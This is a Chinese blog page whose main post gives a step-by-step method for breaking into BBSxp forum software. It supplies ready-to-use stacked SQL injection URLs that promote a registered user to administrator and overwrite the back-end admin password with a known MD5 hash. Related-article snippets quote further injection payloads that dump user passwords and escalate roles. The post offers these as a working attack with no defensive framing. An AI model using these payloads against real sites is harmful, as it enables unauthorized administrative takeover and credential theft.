入侵BBSxp方法

最新推荐文章于 2024-09-01 18:06:09 发布
最新推荐文章于 2024-09-01 18:06:09 发布
阅读量1.2k 收藏
点赞数
分类专栏: 网络安全-漏洞溢出 文章标签: sql 算法 user

入侵方法如下:
目标bbsxp sql版或者 BBSxp 5.00 beta 2 SQL 的
http://xxx.com/bbs
注册一个用户:xxx 密码123456 可以xxx 这里123456的md5算法是:E10ADC3949BA59ABBE56E057F20F883E 呵呵 方便
第一步:在xxx.com/bbs后面输入:LeftTree.asp?menu=menu&id=1;update [user] set membercode=5 where username='xxx';-- 目前 以提升为前台管理员
第二步:在xxx.com/bbs后面输入:LeftTree.asp?menu=menu&id=1;update clubconfig set afficheman='│xxx│',adminpassword='E10ADC3949BA59ABBE56E057F20F883E';--
提升为后台管理员。
xdfwsl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用最基本的SQL注入渗透BBSXP官方网站的台后管理(科普)
07-17 1480
 漏洞分析 序:有一部电影的名字叫着《全职杀手》,剧中的男主角托尔,我非常喜欢他的个性!他非常的cool,i like!呵呵,不知道你看过这部电影没有?不过,我今天要为大家讲解的故事发现在网络当中.这次是一次非常,常见的sql渗透攻击.也是最基础的.过程如下:1.找出漏洞并分析漏洞.2.利用漏洞,得到前台区长密码.3.利用漏洞,得到后台密码.4.添加公告,闪人!开始工作:到bbsxp官方网站下载最
BBSXP最新漏洞 简单注入检測 万能password
weixin_34010566的博客
06-05 91
BBSXP最新漏洞漏洞日期:2005年7月1日受害版本号:眼下全部BBSXP漏洞利用:查前台password注入语句:blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5 查后台password注入语句:blog.asp?id=1%20union%2...
DvBBS v6.0(v6.1) 论坛 to BBSxp
10-09
可转换的内容: 1.论坛帖子(包括主题) 2.论坛用户 3.论坛版面(二级以上的版面归到首个分类) 4.论坛分类
关于BBSXP 7.00 BETA2 SQL通杀教程
weixin_30664539的博客
06-25 84
芊芊做的教程这里记录一下: 注册---->发帖---->编辑(抓包提交)define:cnsapc为注册用户 bug为帖子内容 提升为管理员:&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'-- 获取后台密码"&cnsapc=bug','');...
bbsxp2008.rar_bbsxp
09-14
【标题】"bbsxp2008.rar_bbsxp" 指的是一个名为 "bbsxp2008.rar" 的压缩文件,其中包含了 "bbsxp" 的2008年测试版本。"rar" 文件格式是常见的压缩格式,通常用于打包多个文件或文件夹以便于存储和传输。这个压缩包...
bbsxp.rar_bbsxp_留言
09-23
【标题】"bbsxp.rar_bbsxp_留言" 指的是一个名为 "bbsxp" 的ASP留言程序的压缩文件。这个程序是用于在网站上实现互动交流功能,让用户能够发表评论、提出问题或者分享观点。ASP,全称Active Server Pages,是一种...
BBSXP v1.15
10-13
BBSXP 1.15 Whats New 恢复贴图功能 [img] 使用up.asp更新程序,将更新时间默认值写入数据库,加快程序运行速度 【安装方法】 1.将所有ASP文件和图片文件上传至指定目录(目录可自定) 2.在浏览
BBSXP v1.65 简体中文版
10-13
【标题】"BBSXP v1.65 简体中文版" 是一款基于互联网的论坛软件,专为中文用户设计。BBSXP代表了一种网络社区平台,旨在提供一个方便用户交流观点、分享信息的环境。这个版本1.65表明它是经过多次迭代和改进的成熟...
BBSxp论坛 卡西小镇
12-24
【标题】"BBSxp论坛 卡西小镇" 指的是一款基于BBSxp平台设计的论坛模板,专门用于创建具有卡西小镇特色的在线社区。BBSxp是一款流行的论坛软件,它提供了丰富的功能和自定义选项,使得用户能够轻松构建个性化、互动...
使用sqlmap进行SQL注入攻击
不忘初心,护天下安全!
11-23 9060
SQL注入攻击的特点 ① Web应用程序没有对用户输入进行合法性验证而产生SQL注入漏洞( “空格”的存在和使用); ② 攻击者通过构造特殊的SQL语句,将指令插入系统原始的SQL查询语句中并执行它; ③ 获取数据库的敏感信息,甚至获取主机的控制权。     SQL注入攻击具有广泛性。 原理 SQL注入的原理 ① 地址http://127.0.0.1/inject.asp?dbtype=sq...
SQL注入攻击
人生何适不艰难 赖是胸中万斛宽
06-03 1185
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入
BBSXP2007的一个漏洞公告
Koalsky的专栏
07-03 916
发布时间:2007-7-1文章作者:yl6364 [t.s.b.c.t]文章来源:http://sobiny.cn漏洞消息时间:2007-6-25漏洞起因验证不严影响系统BSSXP2007不受影响系统BBSXP7.0及以下版本危害远程攻击者可以利用漏洞任意修改数据库的数据攻击所需条件攻击者可以发送数据到网站漏洞信息BBSXP是目前互连网上公认速度最快、系统资源占用最小的ASP论坛。(抄的)BBSX
bbsxp 2008 简单搭建
weixin_33713707的博客
02-24 213
闲来无事,自己制作了一个小论坛。今天给大家发上来,希望多给点意见。 这个是bbsxp2008可以在网上找到这个论坛包。不过我会给大家上传一个。好了开始吧。 1如图我们将iis6.0装到windows2003系统上。在这里要选择asp.net这个选项。因为这个论坛是基于asp程序的。 2我们找到bbsxp的论坛包然后解压放到C:\Inetpu...
SQL注入总结(一)
qq_43233085的博客
11-14 1381
科普基础 | 这可能是最全的SQL注入总结(一)SQL注入原理SQL注入的分类MySQL与MSSQL及ACCESS之间的区别判断三种数据库的语句基本手工注入流程报错注入报错注入延时盲注多语句注入内联注入 SQL注入原理 当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入攻击者通过构造不同的sql语句来实现对数据库的任意操作。 SQL注入的分类 按变量类型分:数字型和字符型 按H...
常见SQL注入攻击方式
Jo_kong的博客
11-21 8890
本文主要针对SQL注入的含义、以及如何进行SQL注入和如何预防SQL注入,让小伙伴有个了解。了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,好啦,话不多说,进入正题~ 如何理解SQL注入攻击)? 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意的)...
SQL注入攻击常见方式及测试方法
热门推荐
Lambda_Y的博客
11-04 11万+
本文主要针对SQL注入的含义、以及如何进行SQL注入和如何预防SQL注入让小伙伴有个了解。适用的人群主要是测试人员,了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,至于如何预防SQL注入,按理说应该是开发该了解的事情~但是作为一个棒棒的测试,搞清楚原理是不是能让我们更加透彻地理解bug的产生原因呢~好啦,话不多说,进入正题~ 如何理解SQL注入攻击)? SQL注入
九、安装artifactory并配置PostgreSQL--失败了
最新发布
shafatudou的博客
09-01 1443
基于八,克隆出一个新的虚拟机,用来安装制品库并配置mysql数据库。仅参考,未使用(配置的centos自带的数据库,不会用)
SQL经典五十道选刷
m0_67496588的博客
08-31 1010
SQL经典五十道选刷
bbsxp2008搭建
05-23
bbsxp2008是一款基于ASP.NET的论坛程序,它的主要特点是操作简单,功能齐全,适合个人或小团体的论坛搭建。以下是bbsxp2008的搭建步骤: 1. 确定服务器环境,要求服务器必须支持ASP.NET、IIS等相关技术。 2. 下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值